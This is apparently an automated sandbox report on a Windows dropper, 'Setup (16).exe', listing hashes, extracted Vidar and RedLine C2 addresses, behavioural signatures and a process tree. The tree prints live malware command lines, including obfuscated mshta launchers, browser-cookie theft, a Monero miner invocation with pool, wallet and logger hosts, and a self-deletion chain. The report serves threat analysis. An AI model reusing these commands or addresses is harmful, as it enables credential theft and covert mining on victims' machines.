Resubmissions

11-03-2024 21:22

240311-z8dsssgg58 10

01-09-2021 13:18

210901-5bmxjspa5s 10

01-09-2021 13:04

210901-te4btfspqa 10

01-09-2021 05:12

210901-4wnkwm1p3j 10

31-08-2021 21:47

210831-41rp97dma2 10

31-08-2021 19:51

210831-359awwatje 10

29-08-2021 11:37

210829-18htk4slyj 10

28-08-2021 23:10

210828-rt8b9gzxn6 10

28-08-2021 22:59

210828-zxgnh5j4w6 10

28-08-2021 11:31

210828-xrjs66aknj 10

Analysis

  • max time kernel
    1027s
  • max time network
    1812s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    23-08-2021 15:20

General

  • Target

    Setup (16).exe

  • Size

    631KB

  • MD5

    cb927513ff8ebff4dd52a47f7e42f934

  • SHA1

    0de47c02a8adc4940a6c18621b4e4a619641d029

  • SHA256

    fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f

  • SHA512

    988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c

Malware Config

Extracted

Family

vidar

Version

40.1

Botnet

973

C2

https://eduarroma.tumblr.com/

Attributes
  • profile_id

    973

Extracted

Family

redline

Botnet

1

C2

37.0.8.88:44263

Extracted

Family

vidar

Version

40.1

Botnet

937

C2

https://eduarroma.tumblr.com/

Attributes
  • profile_id

    937

Extracted

Family

vidar

Version

40.1

Botnet

995

C2

https://eduarroma.tumblr.com/

Attributes
  • profile_id

    995

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 1 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 19 IoCs
  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 6 IoCs
  • Blocklisted process makes network request 58 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 3 IoCs
  • Executes dropped EXE 64 IoCs
  • Checks BIOS information in registry 2 TTPs 24 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 6 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 15 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 5 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 13 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 14 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 21 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 50 IoCs
  • Suspicious use of SetThreadContext 18 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 28 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 9 IoCs
  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 61 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 7 IoCs
  • Kills process with taskkill 10 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 16 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Script User-Agent 31 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 40 IoCs
  • Suspicious behavior: SetClipboardViewer 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 12 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
    1⤵
      PID:2380
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Browser
      1⤵
      • Suspicious use of SetThreadContext
      PID:2608
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k SystemNetworkService
        2⤵
        • Executes dropped EXE
        • Drops file in System32 directory
        • Checks processor information in registry
        • Modifies data under HKEY_USERS
        • Modifies registry class
        PID:2692
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2720
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
        1⤵
          PID:2708
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2400
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
            1⤵
              PID:1924
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s SENS
              1⤵
                PID:1448
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                1⤵
                  PID:1340
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Themes
                  1⤵
                    PID:1180
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                    1⤵
                      PID:1128
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      PID:512
                      • C:\Users\Admin\AppData\Roaming\wvrfsjj
                        C:\Users\Admin\AppData\Roaming\wvrfsjj
                        2⤵
                          PID:8416
                      • C:\Users\Admin\AppData\Local\Temp\Setup (16).exe
                        "C:\Users\Admin\AppData\Local\Temp\Setup (16).exe"
                        1⤵
                        • Checks computer location settings
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of WriteProcessMemory
                        PID:4548
                        • C:\Users\Admin\Documents\5T60Ptz228QZMgKpJFeUFt3V.exe
                          "C:\Users\Admin\Documents\5T60Ptz228QZMgKpJFeUFt3V.exe"
                          2⤵
                          • Executes dropped EXE
                          PID:908
                        • C:\Users\Admin\Documents\R6OF4BpTbcUgNN5GriuMhqeU.exe
                          "C:\Users\Admin\Documents\R6OF4BpTbcUgNN5GriuMhqeU.exe"
                          2⤵
                          • Executes dropped EXE
                          PID:1956
                          • C:\Windows\SysWOW64\mshta.exe
                            "C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe ( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN( "C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\R6OF4BpTbcUgNN5GriuMhqeU.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\R6OF4BpTbcUgNN5GriuMhqeU.exe"" ) do taskkill -f -iM ""%~NxA"" " ,0 , TRUE) )
                            3⤵
                              PID:1712
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\R6OF4BpTbcUgNN5GriuMhqeU.exe" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" == "" for %A In ("C:\Users\Admin\Documents\R6OF4BpTbcUgNN5GriuMhqeU.exe" ) do taskkill -f -iM "%~NxA"
                                4⤵
                                  PID:4168
                                  • C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE
                                    hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS
                                    5⤵
                                    • Executes dropped EXE
                                    PID:3904
                                    • C:\Windows\SysWOW64\mshta.exe
                                      "C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe ( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN( "C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF ""-p3auHHA5Pn7qj14hc1xRG9TH8FS "" == """" for %A In (""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" ) do taskkill -f -iM ""%~NxA"" " ,0 , TRUE) )
                                      6⤵
                                        PID:5076
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "-p3auHHA5Pn7qj14hc1xRG9TH8FS " == "" for %A In ("C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" ) do taskkill -f -iM "%~NxA"
                                          7⤵
                                            PID:5084
                                        • C:\Windows\SysWOW64\rundll32.exe
                                          "C:\Windows\System32\rundll32.exe" .\QnEJR.fPC,a
                                          6⤵
                                          • Loads dropped DLL
                                          PID:5228
                                      • C:\Windows\SysWOW64\taskkill.exe
                                        taskkill -f -iM "R6OF4BpTbcUgNN5GriuMhqeU.exe"
                                        5⤵
                                        • Kills process with taskkill
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4372
                                • C:\Users\Admin\Documents\QVFOwoodl8IERGnlHA2kGl0E.exe
                                  "C:\Users\Admin\Documents\QVFOwoodl8IERGnlHA2kGl0E.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • Checks BIOS information in registry
                                  • Checks whether UAC is enabled
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:812
                                • C:\Users\Admin\Documents\x6fbs5GcCGKLlnPzjrUxTy1l.exe
                                  "C:\Users\Admin\Documents\x6fbs5GcCGKLlnPzjrUxTy1l.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  PID:660
                                  • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                    "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                    3⤵
                                    • Executes dropped EXE
                                    PID:4032
                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                      4⤵
                                      • Executes dropped EXE
                                      PID:6060
                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                      4⤵
                                        PID:1232
                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                        4⤵
                                          PID:4408
                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                          4⤵
                                            PID:6160
                                        • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                          "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                          3⤵
                                          • Executes dropped EXE
                                          • Checks whether UAC is enabled
                                          • Drops file in Program Files directory
                                          PID:2152
                                        • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                          "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                          3⤵
                                          • Executes dropped EXE
                                          PID:4536
                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            4⤵
                                            • Executes dropped EXE
                                            PID:768
                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            4⤵
                                              PID:4584
                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              4⤵
                                                PID:5156
                                          • C:\Users\Admin\Documents\pYQYidMVitSy6OHAY3RhYbeM.exe
                                            "C:\Users\Admin\Documents\pYQYidMVitSy6OHAY3RhYbeM.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            • Suspicious use of SetThreadContext
                                            PID:644
                                            • C:\Users\Admin\Documents\pYQYidMVitSy6OHAY3RhYbeM.exe
                                              C:\Users\Admin\Documents\pYQYidMVitSy6OHAY3RhYbeM.exe
                                              3⤵
                                              • Executes dropped EXE
                                              PID:3524
                                            • C:\Users\Admin\Documents\pYQYidMVitSy6OHAY3RhYbeM.exe
                                              C:\Users\Admin\Documents\pYQYidMVitSy6OHAY3RhYbeM.exe
                                              3⤵
                                              • Executes dropped EXE
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:2332
                                          • C:\Users\Admin\Documents\w2xNJjCjAovhTJRapeCigYoz.exe
                                            "C:\Users\Admin\Documents\w2xNJjCjAovhTJRapeCigYoz.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            • Suspicious use of SetThreadContext
                                            PID:504
                                            • C:\Users\Admin\Documents\w2xNJjCjAovhTJRapeCigYoz.exe
                                              "C:\Users\Admin\Documents\w2xNJjCjAovhTJRapeCigYoz.exe"
                                              3⤵
                                                PID:4876
                                            • C:\Users\Admin\Documents\59Z3dp5bi8iBEjfKd90X4PwZ.exe
                                              "C:\Users\Admin\Documents\59Z3dp5bi8iBEjfKd90X4PwZ.exe"
                                              2⤵
                                              • Executes dropped EXE
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:428
                                            • C:\Users\Admin\Documents\_MhbyVtwf_9U1DqPxLVAVkXU.exe
                                              "C:\Users\Admin\Documents\_MhbyVtwf_9U1DqPxLVAVkXU.exe"
                                              2⤵
                                              • Executes dropped EXE
                                              PID:3820
                                              • C:\Users\Admin\Documents\_MhbyVtwf_9U1DqPxLVAVkXU.exe
                                                "C:\Users\Admin\Documents\_MhbyVtwf_9U1DqPxLVAVkXU.exe"
                                                3⤵
                                                • Modifies data under HKEY_USERS
                                                PID:2788
                                            • C:\Users\Admin\Documents\yPPeuwBZpHozbed3iaoGuVAv.exe
                                              "C:\Users\Admin\Documents\yPPeuwBZpHozbed3iaoGuVAv.exe"
                                              2⤵
                                              • Executes dropped EXE
                                              • Suspicious use of SetThreadContext
                                              PID:2704
                                              • C:\Users\Admin\Documents\yPPeuwBZpHozbed3iaoGuVAv.exe
                                                "C:\Users\Admin\Documents\yPPeuwBZpHozbed3iaoGuVAv.exe"
                                                3⤵
                                                  PID:6768
                                              • C:\Users\Admin\Documents\SHglvQt19vNg_UO1wym2Yn6K.exe
                                                "C:\Users\Admin\Documents\SHglvQt19vNg_UO1wym2Yn6K.exe"
                                                2⤵
                                                • Executes dropped EXE
                                                PID:4404
                                              • C:\Users\Admin\Documents\S_49NJFsVD3SCjaWgxRKUbFk.exe
                                                "C:\Users\Admin\Documents\S_49NJFsVD3SCjaWgxRKUbFk.exe"
                                                2⤵
                                                • Executes dropped EXE
                                                • Suspicious use of SetThreadContext
                                                PID:4400
                                                • C:\Users\Admin\Documents\S_49NJFsVD3SCjaWgxRKUbFk.exe
                                                  "C:\Users\Admin\Documents\S_49NJFsVD3SCjaWgxRKUbFk.exe"
                                                  3⤵
                                                  • Executes dropped EXE
                                                  • Checks SCSI registry key(s)
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious behavior: MapViewOfSection
                                                  PID:2868
                                              • C:\Users\Admin\Documents\LF3I7IbCjLby_WxHfJ1WWeuN.exe
                                                "C:\Users\Admin\Documents\LF3I7IbCjLby_WxHfJ1WWeuN.exe"
                                                2⤵
                                                • Executes dropped EXE
                                                • Suspicious use of SetThreadContext
                                                PID:2856
                                                • C:\Users\Admin\Documents\LF3I7IbCjLby_WxHfJ1WWeuN.exe
                                                  C:\Users\Admin\Documents\LF3I7IbCjLby_WxHfJ1WWeuN.exe
                                                  3⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:1528
                                              • C:\Users\Admin\Documents\E60rs2ZlPHKMEHO4LwtgQQ8w.exe
                                                "C:\Users\Admin\Documents\E60rs2ZlPHKMEHO4LwtgQQ8w.exe"
                                                2⤵
                                                • Executes dropped EXE
                                                PID:2852
                                              • C:\Users\Admin\Documents\eyev24tpJD4IlvuXLXoPTgwb.exe
                                                "C:\Users\Admin\Documents\eyev24tpJD4IlvuXLXoPTgwb.exe"
                                                2⤵
                                                • Executes dropped EXE
                                                PID:1852
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1852 -s 1756
                                                  3⤵
                                                  • Program crash
                                                  PID:6056
                                              • C:\Users\Admin\Documents\ODjlkcxnCLBVo4suBpvSTOej.exe
                                                "C:\Users\Admin\Documents\ODjlkcxnCLBVo4suBpvSTOej.exe"
                                                2⤵
                                                • Executes dropped EXE
                                                • Checks BIOS information in registry
                                                • Checks whether UAC is enabled
                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:1700
                                              • C:\Users\Admin\Documents\VQYv5IKcgKWR0jf9xWsa6tQe.exe
                                                "C:\Users\Admin\Documents\VQYv5IKcgKWR0jf9xWsa6tQe.exe"
                                                2⤵
                                                • Executes dropped EXE
                                                PID:1532
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1532 -s 660
                                                  3⤵
                                                  • Executes dropped EXE
                                                  • Program crash
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:4656
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1532 -s 680
                                                  3⤵
                                                  • Program crash
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:1136
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1532 -s 684
                                                  3⤵
                                                  • Program crash
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:5144
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1532 -s 680
                                                  3⤵
                                                  • Program crash
                                                  PID:5424
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1532 -s 1120
                                                  3⤵
                                                  • Program crash
                                                  PID:5052
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1532 -s 1112
                                                  3⤵
                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                  • Executes dropped EXE
                                                  • Program crash
                                                  PID:6052
                                              • C:\Users\Admin\Documents\ikQcr5kQ_PdbXbBstYdZZRR1.exe
                                                "C:\Users\Admin\Documents\ikQcr5kQ_PdbXbBstYdZZRR1.exe"
                                                2⤵
                                                • Executes dropped EXE
                                                • Suspicious use of SetThreadContext
                                                PID:2700
                                                • C:\Users\Admin\Documents\ikQcr5kQ_PdbXbBstYdZZRR1.exe
                                                  C:\Users\Admin\Documents\ikQcr5kQ_PdbXbBstYdZZRR1.exe
                                                  3⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  • Drops file in Program Files directory
                                                  PID:660
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 660 -s 1148
                                                    4⤵
                                                    • Program crash
                                                    PID:1216
                                              • C:\Users\Admin\Documents\6TfWOvJim3LKW0e4V2KcehTL.exe
                                                "C:\Users\Admin\Documents\6TfWOvJim3LKW0e4V2KcehTL.exe"
                                                2⤵
                                                • Executes dropped EXE
                                                • Suspicious use of SetThreadContext
                                                PID:2672
                                                • C:\Users\Admin\Documents\6TfWOvJim3LKW0e4V2KcehTL.exe
                                                  C:\Users\Admin\Documents\6TfWOvJim3LKW0e4V2KcehTL.exe
                                                  3⤵
                                                    PID:2692
                                                  • C:\Users\Admin\Documents\6TfWOvJim3LKW0e4V2KcehTL.exe
                                                    C:\Users\Admin\Documents\6TfWOvJim3LKW0e4V2KcehTL.exe
                                                    3⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:5100
                                                • C:\Users\Admin\Documents\gqfXH5UQhsJsv1whK0VOxbTp.exe
                                                  "C:\Users\Admin\Documents\gqfXH5UQhsJsv1whK0VOxbTp.exe"
                                                  2⤵
                                                  • Executes dropped EXE
                                                  • Checks BIOS information in registry
                                                  • Checks whether UAC is enabled
                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:2260
                                                • C:\Users\Admin\Documents\nfEoAyNpENeQ33zpnmWKy8Av.exe
                                                  "C:\Users\Admin\Documents\nfEoAyNpENeQ33zpnmWKy8Av.exe"
                                                  2⤵
                                                  • Executes dropped EXE
                                                  • Checks BIOS information in registry
                                                  • Checks whether UAC is enabled
                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                  PID:2892
                                                • C:\Users\Admin\Documents\EMeLeiaAL65gfPU3cXm03mAC.exe
                                                  "C:\Users\Admin\Documents\EMeLeiaAL65gfPU3cXm03mAC.exe"
                                                  2⤵
                                                  • Executes dropped EXE
                                                  • Checks BIOS information in registry
                                                  • Checks whether UAC is enabled
                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:3788
                                                • C:\Users\Admin\Documents\OjaAZBKooHpNAY1_Mdtt1lp4.exe
                                                  "C:\Users\Admin\Documents\OjaAZBKooHpNAY1_Mdtt1lp4.exe"
                                                  2⤵
                                                    PID:3136
                                                    • C:\Users\Admin\AppData\Roaming\4467674.exe
                                                      "C:\Users\Admin\AppData\Roaming\4467674.exe"
                                                      3⤵
                                                      • Executes dropped EXE
                                                      • Adds Run key to start application
                                                      PID:5176
                                                      • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                        "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                        4⤵
                                                        • Executes dropped EXE
                                                        PID:5728
                                                    • C:\Users\Admin\AppData\Roaming\5305094.exe
                                                      "C:\Users\Admin\AppData\Roaming\5305094.exe"
                                                      3⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:5244
                                                    • C:\Users\Admin\AppData\Roaming\6308710.exe
                                                      "C:\Users\Admin\AppData\Roaming\6308710.exe"
                                                      3⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:5352
                                                    • C:\Users\Admin\AppData\Roaming\2347707.exe
                                                      "C:\Users\Admin\AppData\Roaming\2347707.exe"
                                                      3⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:596
                                                  • C:\Users\Admin\Documents\TtCgXxRzFthxk3wb3DvkeJoK.exe
                                                    "C:\Users\Admin\Documents\TtCgXxRzFthxk3wb3DvkeJoK.exe"
                                                    2⤵
                                                    • Executes dropped EXE
                                                    PID:1364
                                                  • C:\Users\Admin\Documents\QWWw54M6nS1GeJgV0UpmFUud.exe
                                                    "C:\Users\Admin\Documents\QWWw54M6nS1GeJgV0UpmFUud.exe"
                                                    2⤵
                                                    • Executes dropped EXE
                                                    PID:4180
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4180 -s 484
                                                      3⤵
                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                      • Program crash
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:1016
                                                  • C:\Users\Admin\Documents\fb09plwZUya2cbj8xVsGaM4z.exe
                                                    "C:\Users\Admin\Documents\fb09plwZUya2cbj8xVsGaM4z.exe"
                                                    2⤵
                                                      PID:4140
                                                      • C:\Users\Admin\Documents\fb09plwZUya2cbj8xVsGaM4z.exe
                                                        "C:\Users\Admin\Documents\fb09plwZUya2cbj8xVsGaM4z.exe"
                                                        3⤵
                                                        • Executes dropped EXE
                                                        PID:5520
                                                    • C:\Users\Admin\Documents\OOVdfOqYrFrRP5HsulSeYaDC.exe
                                                      "C:\Users\Admin\Documents\OOVdfOqYrFrRP5HsulSeYaDC.exe"
                                                      2⤵
                                                      • Executes dropped EXE
                                                      PID:500
                                                      • C:\Users\Admin\AppData\Local\Temp\is-MKDUQ.tmp\OOVdfOqYrFrRP5HsulSeYaDC.tmp
                                                        "C:\Users\Admin\AppData\Local\Temp\is-MKDUQ.tmp\OOVdfOqYrFrRP5HsulSeYaDC.tmp" /SL5="$2024A,138429,56832,C:\Users\Admin\Documents\OOVdfOqYrFrRP5HsulSeYaDC.exe"
                                                        3⤵
                                                          PID:4336
                                                          • C:\Users\Admin\AppData\Local\Temp\is-5SUJ2.tmp\Setup.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\is-5SUJ2.tmp\Setup.exe" /Verysilent
                                                            4⤵
                                                              PID:6084
                                                              • C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe
                                                                "C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent
                                                                5⤵
                                                                • Executes dropped EXE
                                                                PID:1008
                                                                • C:\Users\Admin\AppData\Local\Temp\is-N0449.tmp\Stats.tmp
                                                                  "C:\Users\Admin\AppData\Local\Temp\is-N0449.tmp\Stats.tmp" /SL5="$202CE,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent
                                                                  6⤵
                                                                  • Executes dropped EXE
                                                                  • Loads dropped DLL
                                                                  • Suspicious use of FindShellTrayWindow
                                                                  PID:5648
                                                                  • C:\Users\Admin\AppData\Local\Temp\is-2UVVD.tmp\builder.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\is-2UVVD.tmp\builder.exe" -algo'' -pool'stratum+tcp://xmr-asia1.nanopool.org:14444' -wallet'42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s' -load'50' -idleload'50' -loggerSa'2no.co' -loggerS'1C6Ua7' -loggerRa'iplogger.org' -loggerR'1cmAy7' -loggerWa'2no.co' -loggerW'' -ico'' -glue'' -error'' -worker'' -icrypt'' -sremoval'' -ntask'SystemCheck' -ptask'System\' -atask'Microsoft_Corporation' -dtask'Starts_a_system_diagnostics_application_to_scan_for_errors_and_performance_problems.' -pinstall'Roaming\Microsoft\Windows\' -ninstall'Helper' -sinstall'-SystemCheck'
                                                                    7⤵
                                                                    • Loads dropped DLL
                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                    • Suspicious use of SetWindowsHookEx
                                                                    PID:5604
                                                              • C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe
                                                                "C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"
                                                                5⤵
                                                                • Executes dropped EXE
                                                                • Loads dropped DLL
                                                                • Checks processor information in registry
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:3136
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im runvd.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe" & del C:\ProgramData\*.dll & exit
                                                                  6⤵
                                                                    PID:5988
                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                      taskkill /im runvd.exe /f
                                                                      7⤵
                                                                      • Kills process with taskkill
